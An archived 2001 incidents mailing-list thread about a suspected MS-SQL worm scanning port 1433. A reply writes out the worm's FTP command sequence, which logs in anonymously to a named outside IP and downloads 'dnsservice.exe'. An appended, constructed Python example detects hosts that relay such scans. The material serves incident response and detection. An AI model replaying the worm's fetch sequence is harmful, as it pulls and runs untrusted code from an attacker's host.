Security Incidents mailing list archives

Re: MS-SQL Worm?


From: "Arthur Donkers" <A.Donkers () reseau nl>
Date: Tue, 20 Nov 2001 17:47:16 +0100

To follow up on my own reply:

The worm ftp's to 207.29.192.160 and executes the following
ftp commands:

ftp
foo.com
bin
cd pub
cd tmp
get dnsservice.exe
close
quit

using anonymous ftp and foo.com as a password

My lesson: first read then reply ...

Arthur

----- Original Message ----- 
From: "Douglas P. Brown" <dugbrown () email unc edu>
To: <incidents () securityfocus com>; <unisog () sans org>
Cc: "ITS Security" <security () unc edu>
Sent: Tuesday, November 20, 2001 3:54 PM
Subject: MS-SQL Worm?



We saw a scan come in looking for systems answering on 1433, and
immediately saw several systems start scanning out for other systems
answering on 1433 - worm behavior?  Has anyone else seen this?

thanks,
-Doug
-- 
Douglas P. Brown
University of North Carolina
Manager of Security Resources
105 Abernethy Hall



----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com
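
Added example (not part of either message above): a minimal check for the pattern the thread describes, local hosts that receive a connection on TCP 1433 and shortly afterwards contact many distinct hosts on 1433. The flow-record format, the 10.0.0.0/8 local range, the thresholds and all names are assumptions, and the sample records are constructed.

```python
import ipaddress
from collections import defaultdict

LOCAL_NET = ipaddress.ip_network("10.0.0.0/8")  # assumption: the site's address space
MSSQL_PORT = 1433


def is_local(addr):
    return ipaddress.ip_address(addr) in LOCAL_NET


def find_scan_relays(flows, window=300, min_targets=10):
    """Return {host: distinct 1433 targets} for local hosts that were contacted
    on 1433 and, within `window` seconds, contacted >= `min_targets` hosts on 1433."""
    probed_at = {}              # local host -> time of first inbound 1433 connection
    targets = defaultdict(set)  # local host -> distinct hosts it contacted afterwards
    for ts, src, dst, dport in sorted(flows):
        if dport != MSSQL_PORT or src == dst:
            continue
        if is_local(dst):
            probed_at.setdefault(dst, ts)
        if src in probed_at and ts - probed_at[src] <= window:
            targets[src].add(dst)
    return {h: len(t) for h, t in targets.items() if len(t) >= min_targets}


def sample_flows():
    """Constructed records (time_s, src, dst, dst_port); not data from the thread."""
    # Inbound sweep of the local range on 1433.
    flows = [(i, "198.51.100.7", f"10.0.0.{i + 1}", 1433) for i in range(30)]
    # One swept host starts contacting many outside hosts on 1433.
    flows += [(40 + i, "10.0.0.12", f"203.0.113.{i + 1}", 1433) for i in range(20)]
    # Ordinary application traffic to a single database server.
    flows += [(t, "10.0.0.5", "10.0.0.20", 1433) for t in (50, 100, 150)]
    # Traffic on another port is ignored.
    flows += [(45, "10.0.0.12", "203.0.113.9", 80)]
    return flows


if __name__ == "__main__":
    for host, count in find_scan_relays(sample_flows()).items():
        print(f"{host} contacted {count} hosts on 1433 after being contacted on 1433")
```

The distinct-target threshold keeps an application server that talks to one database from being flagged; tune `window` and `min_targets` to the site's own traffic.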

